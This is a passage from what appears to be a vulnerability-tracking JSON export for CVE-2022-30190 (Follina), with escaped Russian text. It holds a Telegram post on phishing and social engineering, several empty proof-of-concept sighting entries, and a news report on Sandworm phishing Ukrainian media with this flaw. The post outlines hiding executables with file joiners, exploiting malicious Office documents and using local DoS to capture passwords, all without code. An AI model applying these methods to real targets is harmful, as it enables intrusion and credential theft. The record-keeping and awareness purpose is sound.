\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430 - \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0437\u0430\u043c\u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 . \u0414\u043b\u044f \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043c\u0435\u0442\u043e\u0434\u044b \u0430-\u043b\u044f OSINT \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u0431 \u0446\u0435\u043b\u0438 \u0438 \u043f\u043e\u0442\u043e\u043c \u0443\u0436\u0435 \u0433\u0440\u0430\u043c\u043e\u0442\u043d\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438.  \n\u0414\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u0441\u043f\u0440\u044f\u0442\u0430\u0442\u044c exe \u0432 \u043b\u044e\u0431\u043e\u043c \u0434\u0440\u0443\u0433\u043e\u043c \u0444\u043e\u0440\u043c\u0430\u0442\u0435 \u044e\u0437\u0430\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0434\u0436\u043e\u0439\u043d\u0435\u0440\u044b \u0444\u0430\u0439\u043b\u043e\u0432 \u0438\u043b\u0438 \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \u0441 asm exe \u0444\u0430\u043b\u043e\u0432 . \u041f\u043e\u0442\u043e\u043c \u043f\u0440\u0438\u0434\u0443\u043c\u044b\u0432\u0430\u044e \u0431\u043e\u043b\u0435\u0435 \u043b\u0438 \u043c\u0435\u043d\u0435\u0435 \u0443\u0431\u0435\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u043a\u0430\u0437\u043a\u0443 \u0438\u043b\u0438 \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0442 \u0436\u0435\u0440\u0442\u0432\u0435(\u0430\u043c). \u041f\u0440\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043f\u0440\u0438\u0432\u0435\u0434\u0443 \u0432 \u043f\u0440\u0438\u043c\u0435\u0440 \u0447\u0442\u043e \u043d\u0438\u0442\u044c \u043d\u043e\u0432\u0435\u043d\u044c\u043a\u043e\u0435 \u0442\u0430\u043a\u043e\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0437\u0432\u0441\u0442\u043d\u0430\u044f CVE-2022-30190 \u043d\u0430 \u043d\u0435\u0435 \u0435\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b -  \u0442\u044b\u043a .\n\u0427\u0442\u043e \u043e\u043d\u0430 \u0434\u0435\u043b\u0430\u0435\u0442?  \n\u042d\u0442\u0430  \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office.\n\u041a\u043e\u0433\u0434\u0430 \u0447\u0442\u043e-\u0442\u043e \u0438\u0434\u0435\u0442 \u043d\u0435 \u0442\u0430\u043a \u0441 Windows \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0438\u0437 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0447\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 URL-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b MSDT. \n\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0432\u044b\u0437\u0432\u0430\u0432\u0448\u0435\u0433\u043e MSDT, \u0442\u043e \u0435\u0441\u0442\u044c \u0432 \u043d\u0430\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043e\u0442\u043a\u0440\u044b\u0432\u0448\u0435\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b.\n\u041f\u043e\u0434\u043e\u0431\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \n\n\u0415\u0449\u0435 \u0434\u043b\u044f \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0432\u0435\u0431 \u0441\u0430\u0439\u0442\u044b . \n\u042d\u0442\u043e \u0442\u043e\u0436\u0435 \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0432\u0435\u0441\u044c\u043c\u0430 \u043f\u0440\u043e\u0441\u0442\u043e . \n\u0415\u0441\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433 \u043a\u043e\u0433\u0434\u0430 \u0445\u0430\u043a\u0435\u0440 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u044c\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0438 \u0435\u043c\u0443 \u043d\u0443\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c \u043f\u0430\u0440\u043e\u043b\u0438 \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 . \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u044e\u0437\u0430\u044e\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u043e\u0441 \u0430\u0442\u0430\u043a\u0438 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pyersinia \u0447\u0442\u043e\u0431\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432\u044b \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b\u043e\u0441\u044c, \u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 . \n\u0412\u043e\u0442 \u0441\u0430\u0442\u044c\u044f \u043f\u0440\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0447\u0435\u0440\u0435\u0437 wireshark \n\n\u0422\u0435\u043f\u0435\u0440\u044c \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 , \u0433\u0434\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \"\u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c\" .\n\u041f\u0435\u0440\u0432\u043e\u0435, \u0447\u0442\u043e \u043f\u0440\u043e\u0445\u043e\u0434\u0438 \u0432 \u0433\u043e\u043b\u043e\u0432\u0443 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 .  \u041a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f \"\u0441\u0430\u043c\u043e\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0435 \u0437\u0432\u0435\u043d\u043e \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u044d\u0442\u043e \u0443\u0431\u043e\u0440\u0449\u0438\u0446\u0430\" - \u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043e\u043d\u0430 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u0442 \u0432 \u043a\u043e\u043c\u043f\u0430\u0445 , \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u043b\u0430\u0442\u0438\u0442\u044c \u0435\u0439 \u0438 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u0442\u044c \u0432\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0444\u043b\u0435\u0448\u043a\u0443\ud83e\udda0  \u0418\u043b\u0438 \u043f\u043e\u043c\u043d\u0438\u0442\u0435 \u043a\u0430\u043a \u0434\u0435\u043b\u0430\u043b\u0438 \u043b\u0430\u043f\u0441\u0443\u0441 (\u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043f\u0440\u043e\u0441\u0438\u043b\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u043d\u0438\u043c\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u0447\u0430\u0442\u044c ) . \n\u0415\u0449\u0435 \u0435\u0441\u043b\u0438 \u0443\u0436 \u043d\u0438\u043a\u043e\u0433\u043e \u0438\u0437 \u043d\u0435 \u0432\u044b\u0448\u043b\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u0442\u044c , \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441\u0430\u043c\u043e\u043c\u0443 . \u0414\u043b\u044f \u0442\u0430\u043a\u043e\u0433\u043e \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0442\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0438\u043b\u0438 \u044f \u0433\u0434\u0435-\u0442\u043e \u0432\u0438\u0434\u0435\u043b\u0430 \u0447\u0442\u043e \u043e\u043d\u0438 \u0440\u043e\u044e\u0442\u0441\u044f \u0432 \u043e\u0444\u0438\u0441\u043d\u044b\u0445 \u043c\u0443\u0441\u043e\u0440\u043d\u044b\u0445 \u0431\u0430\u043a\u0430\u0445(\u043d\u0438\u0447\u0435\u0433\u043e \u0441\u043c\u0435\u0448\u043d\u043e\u0433\u043e \u043a\u0442\u043e-\u0442\u043e \u0442\u0443\u0434\u0430 \u0432\u044b\u043a\u0438\u0434\u044b\u0432\u0430\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u0438)  , \u0435\u0449\u0435 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, \u0434\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0437\u0434\u0430\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u0441\u0442\u043e \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e \u0438\u0434\u0442\u0438 \u0437\u0430 \u043a\u0435\u043c \u0442\u043e.\n\u0412\u043e\u043e\u0431\u0449\u0435 \u0435\u0441\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u0441\u0442\u0440\u043e\u0433\u0438\u0435 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043c\u0435\u0441\u0442\u0430 , \u0442\u0430\u043c \u043e\u043d\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u044e\u0442 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u0438\u043b\u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u044f\u0442 \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0438\u043c\u0435\u043d\u043d\u043e \u0441 \u043d\u0438\u043c\u0438 ..\n\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u0437\u0430\u0442\u0440\u043e\u043d\u0443 \u043a\u0430\u043a \u0441 \u044d\u0442\u0438\u043c \u0431\u043e\u0440\u043e\u0442\u044c\u0441\u044f .\n\u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0431\u044b\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 , \u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u0441 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e \u043f\u043a \u043a\u0430\u043a\u0438\u0435-\u043b\u0438\u0431\u043e \u0441\u0432\u043e\u0438 \u043f\u0438\u0441\u044c\u043c\u0430 \u043d\u0430 email  \u0441 \u043d\u0435\u0437\u043d\u0430\u043a\u043e\u043c\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 , \u043d\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0430\u043c , \u0447\u0430\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u0435\u0442\u044c \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u0438 \u0432\u043e\u043e\u0431\u0449\u0435 \u0431\u043e\u043b\u0435\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u043a\u043e \u0432\u0441\u0435\u043c\u0443 .  \u041d\u0430\u0441\u0447\u0435\u0442 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0432\u0438\u0434\u0430: \u043a\u0430\u043a \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 , \u043d\u0443 \u044d\u0442\u043e \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u043b\u043e\u0436\u043d\u044b\u0439 \u0432\u043e\u043f\u0440\u043e\u0441 - \u043d\u0430\u0432\u0435\u0440\u043d\u043e\u0435 \u0441\u0442\u043e\u0438\u0442 \u0447\u0430\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 . \u0412\u043e\u043e\u0431\u0449\u0435 \u0442\u0435\u043c\u0430 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043e\u0431\u0448\u0438\u0440\u043d\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043c\u043d\u043e\u0433\u0438\u0435 \u0441\u0444\u0435\u0440\u044b \u0436\u0438\u0437\u043d\u0438  ,\u041d\u041e \u044f \u0434\u0443\u043c\u0430\u044e \u043a\u043e\u0440\u043e\u0442\u043a\u043e \u0432\u044b \u043f\u043e\u043d\u044f\u043b\u0438. \u0415\u0441\u043b\u0438 \u0447\u0442\u043e  \u044f \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u0442\u0435\u0439 \u043f\u0440\u043e \u043c\u0435\u0442\u043e\u0434\u044b \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u043d\u0438\u0436\u0435 . \n\u0410 \u0442\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0447\u0430\u0441\u0442\u0438 .\n#virus #social_engineering", "creation_timestamp": "2022-09-24T08:34:34.000000Z"}, {"uuid": "01a1e421-d0c0-432f-8295-6eed3a6e4983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/rvXi86HDIl7XGWfAbwrfkCDBY-P6DLuptUq4D-tOA8F9OF0", "content": "", "creation_timestamp": "2026-04-10T15:00:21.000000Z"}, {"uuid": "27040cbf-7dbd-4570-9998-122d29149439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/8wPJR4Zrqe1NVpmz6R4R-oJOE4FmewBY2nxE00bK5aCo0SE", "content": "", "creation_timestamp": "2025-10-18T19:00:11.000000Z"}, {"uuid": "a79ef736-c40a-4873-aed8-160fc4fb8943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/ZHsH8l_PJf6qA-LG3pwKoQfrYnUBM4bmr6171DkIh35gCrQ", "content": "", "creation_timestamp": "2025-10-18T21:00:05.000000Z"}, {"uuid": "b0c09fb6-555b-4216-bab9-346ba17d1049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/JqVwQ-JC9B9ph46qq_gs1KPvHPPLX-_sQPp9do9RGc2keWM", "content": "", "creation_timestamp": "2026-04-10T21:00:05.000000Z"}, {"uuid": "1ae98914-a449-460f-be44-61fd4f13aaf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/825", "content": "\u200b\ud83c\udde8\ud83c\uddf3 \u0425\u0430\u043a\u0435\u0440\u044b Sandworm \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina.\n\n\ud83d\udcac \u041f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u044b\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u0443\u0437\u043d\u0430\u043b\u0430 \u043e \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438: \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0437 \u0420\u043e\u0441\u0441\u0438\u0438 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u043c \u0421\u041c\u0418 (\u0440\u0430\u0434\u0438\u043e\u0441\u0442\u0430\u043d\u0446\u0438\u044f\u043c, \u0433\u0430\u0437\u0435\u0442\u0430\u043c, \u043d\u043e\u0432\u043e\u0441\u0442\u043d\u044b\u043c \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430\u043c \u0438 \u043f\u0440.). \u0412 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 CERT-UA \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u044b\u0448\u0435 500 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u041f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0442\u0435\u043c\u043e\u0439 \u00ab\u0421\u043f\u0438\u0441\u043e\u043a \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043a\u0430\u0440\u0442\u044b\u00bb \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442\u0441\u044f \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u044f\u0449\u0438\u043a\u043e\u0432 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439. \u0412 \u043d\u0438\u0445 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442\u0441\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u00ab\u0421\u041f\u0418\u0421\u041e\u041a\u043f\u043e\u0441\u0438\u043b\u0430\u043d\u044c\u043d\u0430\u0456\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u0456\u043a\u0430\u0440\u0442\u0438.docx\u00bb, \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f HTML-\u0444\u0430\u0439\u043b \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f JavaScript-\u043a\u043e\u0434, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0449\u0438\u0439 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0438\u0439 EXE-\u0444\u0430\u0439\u043b 2.txt. \u042d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e CrescentImp.\n\n\u0412 \u0445\u043e\u0434\u0435 \u0430\u0442\u0430\u043a\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0438 Microsoft Windows Support Diagnostic Tool (MSDT), \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0443\u044e \u043a\u0430\u043a Follina. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Windows. \u041e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043e\u0442 Microsoft \u0434\u043b\u044f \u043d\u0435\u0435 \u043d\u0435\u0442, \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 0patch \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447.\n\n\u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442 CERT-UA, \u0437\u0430 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c\u0438 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430 